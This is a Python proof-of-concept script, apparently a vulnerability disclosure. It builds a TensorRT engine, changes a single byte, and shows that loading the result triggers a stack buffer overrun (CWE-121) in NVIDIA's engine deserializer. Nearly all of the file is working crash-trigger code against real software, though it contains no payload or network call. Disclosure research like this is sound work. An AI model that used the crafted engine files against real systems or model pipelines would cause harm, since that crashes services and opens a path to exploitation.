# tensorrt-stack-overrun-poc / vuln009_standalone_poc.py
# treforbenbow's picture
# Upload vuln009_standalone_poc.py with huggingface_hub
# f145112 verified
"""
VULN-009: Stack Buffer Overrun in TensorRT Engine Deserializer
================================================================
A single-byte mutation in the NGNE (engine graph) section of a valid
TensorRT engine file triggers STATUS_STACK_BUFFER_OVERRUN (0xC0000409)
during deserializeCudaEngine().
This indicates a stack-based buffer overflow detected by the Windows /GS
stack cookie protection. The crash occurs in the closed-source
libnvinfer.dll engine parser.
CWE: CWE-121 (Stack-based Buffer Overflow)
Distinct from VULN-006 (CWE-125, Out-of-bounds Read / ACCESS_VIOLATION)
Distinct from VULN-008 (CWE-369, Integer Divide-by-Zero)
To reproduce:
1. python vuln009_standalone_poc.py build (builds valid + crash engines)
2. python vuln009_standalone_poc.py crash (loads crash engine, triggers crash)
3. python vuln009_standalone_poc.py verify (full verification)
"""
import os, sys, struct, subprocess, time
import numpy as np
# Both engine files are kept in the directory that contains this script, so
# the sub-commands locate them independently of the current working directory.
POC_DIR = os.path.dirname(os.path.abspath(__file__))
VALID_PATH, CRASH_PATH = (
    os.path.join(POC_DIR, file_name)
    for file_name in ("vuln009_valid.engine", "vuln009_crash.engine")
)

# Mutation applied to the serialized engine (found by a full scan):
# the byte at CRASH_OFFSET is overwritten with CRASH_VALUE.
CRASH_OFFSET = 498
CRASH_VALUE = 0xFF
# NOTE(review): presumably the byte found at CRASH_OFFSET in the unmodified
# engine; it is not referenced anywhere in the visible code -- confirm.
ORIGINAL_VALUE = 0x00
def cmd_build():
    """Build the valid engine, then write the single-byte crash variant.

    A one-node ONNX model (BatchNormalization over a 1x8x4x4 float input) is
    built in memory, compiled to a serialized TensorRT engine and written to
    VALID_PATH.  The engine is deserialized once as a sanity check, then a
    copy with the byte at CRASH_OFFSET replaced by CRASH_VALUE is written to
    CRASH_PATH.

    Raises:
        RuntimeError: if ONNX parsing, the engine build or the sanity-check
            load fails, or if the engine is too short to contain
            CRASH_OFFSET.
    """
    import tensorrt as trt
    from onnx import helper, TensorProto, numpy_helper

    print("[*] Building valid BatchNorm TensorRT engine...")
    bn_s = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_s")
    bn_b = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_b")
    bn_m = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_m")
    bn_v = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_v")
    g = helper.make_graph(
        [helper.make_node("BatchNormalization", ["x", "bn_s", "bn_b", "bn_m", "bn_v"], ["output"])],
        "batchnorm",
        [helper.make_tensor_value_info("x", TensorProto.FLOAT, [1, 8, 4, 4])],
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, None)],
        [bn_s, bn_b, bn_m, bn_v])
    model = helper.make_model(g, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8

    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
    parser = trt.OnnxParser(network, logger)
    # Explicit checks rather than ``assert``: under ``python -O`` asserts are
    # stripped, which would silently skip the parser.parse() call itself.
    if not parser.parse(model.SerializeToString()):
        raise RuntimeError("Parse failed")
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
    engine_bytes = builder.build_serialized_network(network, config)
    if not engine_bytes:
        raise RuntimeError("Build failed")
    engine_data = bytes(engine_bytes)

    # Save valid engine
    with open(VALID_PATH, "wb") as f:
        f.write(engine_data)
    print(f"[+] Valid engine: {VALID_PATH} ({len(engine_data)} bytes)")

    # Verify it loads
    runtime = trt.Runtime(logger)
    engine = runtime.deserialize_cuda_engine(engine_data)
    if not engine:
        raise RuntimeError("Valid engine failed to load")
    print("[+] Valid engine loads OK")

    # Create crash variant
    if CRASH_OFFSET >= len(engine_data):
        raise RuntimeError(
            f"Engine is only {len(engine_data)} bytes; "
            f"cannot mutate offset {CRASH_OFFSET}")
    current = engine_data[CRASH_OFFSET]
    if current != ORIGINAL_VALUE:
        # NOTE(review): assumes ORIGINAL_VALUE is the byte the scan saw at
        # CRASH_OFFSET; a mismatch suggests this engine is laid out
        # differently, so the mutation may not hit the same field.
        print(f"[!] Byte at offset {CRASH_OFFSET} is 0x{current:02x}, "
              f"expected 0x{ORIGINAL_VALUE:02x}; result may differ")
    mutated = bytearray(engine_data)
    print(f"[*] Mutating byte at offset {CRASH_OFFSET}: 0x{current:02x} -> 0x{CRASH_VALUE:02x}")
    mutated[CRASH_OFFSET] = CRASH_VALUE
    with open(CRASH_PATH, "wb") as f:
        f.write(mutated)
    print(f"[+] Crash engine: {CRASH_PATH} ({len(mutated)} bytes)")
    print(f"[+] Build complete. Run 'python {os.path.basename(__file__)} crash' to trigger.")
def cmd_crash():
    """Deserialize the mutated engine inside the current process.

    Exits with status 1 when CRASH_PATH does not exist.  Otherwise the file
    is read and handed to ``deserialize_cuda_engine``; the script expects
    that call to terminate the process with STATUS_STACK_BUFFER_OVERRUN.  If
    the call returns instead, a message reports whether an engine object was
    produced or the data was rejected.
    """
    import tensorrt as trt

    if not os.path.exists(CRASH_PATH):
        print("[-] Crash engine not found. Run 'build' first.")
        sys.exit(1)

    print(f"[*] Loading crash engine: {CRASH_PATH}")
    print("[*] Expecting STATUS_STACK_BUFFER_OVERRUN (0xC0000409)...")

    trt_runtime = trt.Runtime(trt.Logger(trt.Logger.ERROR))
    with open(CRASH_PATH, "rb") as engine_file:
        blob = engine_file.read()

    # The process is expected to die inside this call.
    loaded = trt_runtime.deserialize_cuda_engine(blob)

    # Only reached when no crash happened.
    print(
        "[!] Engine loaded (unexpected - crash should have occurred)"
        if loaded
        else "[*] Engine rejected (no crash, but deserialization failed)"
    )
def cmd_verify():
    """Run the full verification: load both engines in child processes.

    Steps:
      1. Load the valid engine in a subprocess; it must exit with code 0.
      2. Load the crash engine in a subprocess and classify the exit code.
      3. Print every byte that differs between the two engine files.
      4. Repeat the crash load 10 times and count the stack-overrun exits.

    Exits with status 1 if either engine file is missing.

    Raises:
        RuntimeError: if the valid engine does not load with exit code 0.
    """
    # Exit codes the child is compared against, written in hex so they match
    # the names printed below (0xC0000409 == 3221226505,
    # 0xC0000005 == 3221225477).
    stack_overrun = 0xC0000409
    access_violation = 0xC0000005
    runs = 10

    if not (os.path.exists(VALID_PATH) and os.path.exists(CRASH_PATH)):
        print("[-] Engine files not found. Run 'build' first.")
        sys.exit(1)

    print("[1] Testing valid engine...")
    rc1 = _test_engine_subprocess(VALID_PATH)
    print(f" Return code: {rc1}")
    # Explicit check: an ``assert`` would be stripped under ``python -O``.
    if rc1 != 0:
        raise RuntimeError("Valid engine should load OK")

    print("[2] Testing crash engine...")
    rc2 = _test_engine_subprocess(CRASH_PATH)
    print(f" Return code: {rc2}")
    if rc2 == stack_overrun:
        print("[+] CONFIRMED: STATUS_STACK_BUFFER_OVERRUN (0xC0000409)")
        print("[+] CWE-121: Stack-based Buffer Overflow")
        print("[+] This is a DISTINCT vulnerability from VULN-006 (ACCESS_VIOLATION)")
    elif rc2 == access_violation:
        print("[!] ACCESS_VIOLATION (0xC0000005) - different crash type")
    else:
        print(f"[?] Unexpected return code: {rc2}")

    # Show diff (context managers so the file handles are closed promptly)
    with open(VALID_PATH, "rb") as f:
        valid = f.read()
    with open(CRASH_PATH, "rb") as f:
        crash = f.read()
    diffs = [(off, v, c) for off, (v, c) in enumerate(zip(valid, crash)) if v != c]
    print("\n[3] Difference between valid and crash engines:")
    for off, v, c in diffs:
        print(f" Offset {off}: 0x{v:02x} -> 0x{c:02x}")
    if len(valid) != len(crash):
        # zip() stops at the shorter file; say so instead of hiding the tail.
        print(f" Length differs: {len(valid)} vs {len(crash)} bytes")

    # Reproducibility test
    print(f"\n[4] Reproducibility test ({runs} runs)...")
    results = [_test_engine_subprocess(CRASH_PATH) for _ in range(runs)]
    crash_count = results.count(stack_overrun)
    print(f" Stack overrun: {crash_count}/{runs} runs")
    print(f" Return codes: {results}")
def _test_engine_subprocess(engine_path):
    """Deserialize *engine_path* in a child interpreter and return its exit code.

    The load runs in a separate process so that a crash inside the
    deserializer only shows up as the child's exit status instead of
    terminating the caller.

    The path is passed to the child through ``sys.argv`` rather than being
    pasted into the child's source text, so a quote or backslash in the path
    can neither break nor inject into the child script.  The child's output
    is discarded; only the exit status is used.

    Returns:
        0 if an engine object was produced, 2 if deserialization returned no
        engine without crashing, -999 if the child did not finish within 15
        seconds, otherwise the exit status reported for the child process.
    """
    child_code = "\n".join((
        "import sys",
        "import tensorrt as trt",
        "logger = trt.Logger(trt.Logger.ERROR)",
        "runtime = trt.Runtime(logger)",
        'with open(sys.argv[1], "rb") as f:',
        "    engine = runtime.deserialize_cuda_engine(f.read())",
        # Distinguish a graceful rejection from a successful load.
        "sys.exit(0 if engine else 2)",
    ))
    try:
        completed = subprocess.run(
            [sys.executable, "-c", child_code, engine_path],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=15,
        )
    except subprocess.TimeoutExpired:
        return -999
    return completed.returncode
if __name__ == "__main__":
    # Command-line entry point: the first argument selects the sub-command.
    if len(sys.argv) < 2:
        print(f"Usage: python {os.path.basename(__file__)} [build|crash|verify]")
        sys.exit(1)

    cmd = sys.argv[1]
    # Dispatch table from sub-command name to its handler.
    handler = {
        "build": cmd_build,
        "crash": cmd_crash,
        "verify": cmd_verify,
    }.get(cmd)
    if handler is None:
        print(f"Unknown command: {cmd}")
        sys.exit(1)
    handler()